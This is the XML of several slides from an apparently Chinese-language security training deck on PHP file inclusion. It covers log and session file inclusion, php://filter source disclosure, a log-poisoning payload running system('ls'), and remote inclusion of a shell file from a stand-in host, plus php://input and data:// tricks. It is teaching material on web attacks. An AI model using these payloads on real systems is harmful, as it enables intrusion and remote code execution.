            <a:r>
              <a:t>已有特殊的功能直接包含</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:t>没有任何过滤的可以包含本地日志文件（访问日志和错误日志），如果</a:t>
            </a:r>
            <a:r>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:t>可控，则可以包含</a:t>
            </a:r>
            <a:r>
              <a:t>session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:t>流</a:t>
            </a:r>
            <a:r>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>?file=php://filter/convert.base64-encode/resource=index.php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内容占位符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8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图片 4" descr="图片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07288" y="6021287"/>
            <a:ext cx="836713" cy="836713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矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274742" y="1278021"/>
            <a:ext cx="648072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>
                <a:ln w="18415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pPr>
            <a:r>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:t>错误日志包含</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1646332" y="2495173"/>
            <a:ext cx="6480720" cy="21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n w="13811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pPr>
            <a:r>
              <a:t>目前的日志包含在新版本的</a:t>
            </a:r>
            <a:r>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:t>中已经无法使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>&lt;?php include(“/var/log/apache2/error.log”); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>但是对于</a:t>
            </a:r>
            <a:r>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:t>应用（不是容器）产生的日志，我们还是可以包含的。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:ln w="18415">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:ln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矩形 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827529" y="2792095"/>
            <a:ext cx="6144262" cy="2593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t>带上攻击</a:t>
            </a:r>
            <a:r>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:t>去访问</a:t>
            </a:r>
            <a:r>
              <a:t>index.php（</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF6C4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex web_lfi_1</a:t>
            </a:r>
            <a:r>
              <a:t>)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	/index.php?act=&lt;?php system('ls');?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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t>尝试去包含</a:t>
            </a:r>
            <a:r>
              <a:t>url.txt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  </a:t>
            </a:r>
            <a:r>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:t>/index.php?act=url.txt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	  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5" name="矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177588" y="1291357"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>攻击实践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8" name="内容占位符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9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图片 4" descr="图片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07288" y="6021287"/>
            <a:ext cx="836713" cy="836713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矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274742" y="1278021"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>session文件包含</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1646332" y="2495173"/>
            <a:ext cx="6480720" cy="167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>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:t>cookie      session.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:t>伪造   </a:t>
            </a:r>
            <a:r>
              <a:t>cookie.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>判断</a:t>
            </a:r>
            <a:r>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:t>文件位置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>通过用户名控制</a:t>
            </a:r>
            <a:r>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:t>变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>本地包含</a:t>
            </a:r>
            <a:r>
              <a:t>session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5" name="内容占位符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6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图片 4" descr="图片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07288" y="6021287"/>
            <a:ext cx="836713" cy="836713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矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177587" y="834157"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>远程文件包含</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516791" y="2220853"/>
            <a:ext cx="6480721" cy="381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n w="13811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pPr>
            <a:r>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:t>普通远程包含( </a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FF6C4D"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF6C4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex web_lfi_1 remote.php)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>?file=[http|https|ftp]://example.com/shell.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:t>allow_url_fopen=On</a:t>
            </a:r>
            <a:r>
              <a:t>并且 </a:t>
            </a:r>
            <a:r>
              <a:t>allow_url_include=On)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>2. php </a:t>
            </a:r>
            <a:r>
              <a:t>伪协议远程包含</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>?file=php://input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:t>allow_url_include=On</a:t>
            </a:r>
            <a:r>
              <a:t>，详细</a:t>
            </a:r>
            <a:r>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:ln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http://php.net/manual/en/wrappers.php.php</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:t>data URIs</a:t>
            </a:r>
            <a:r>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811"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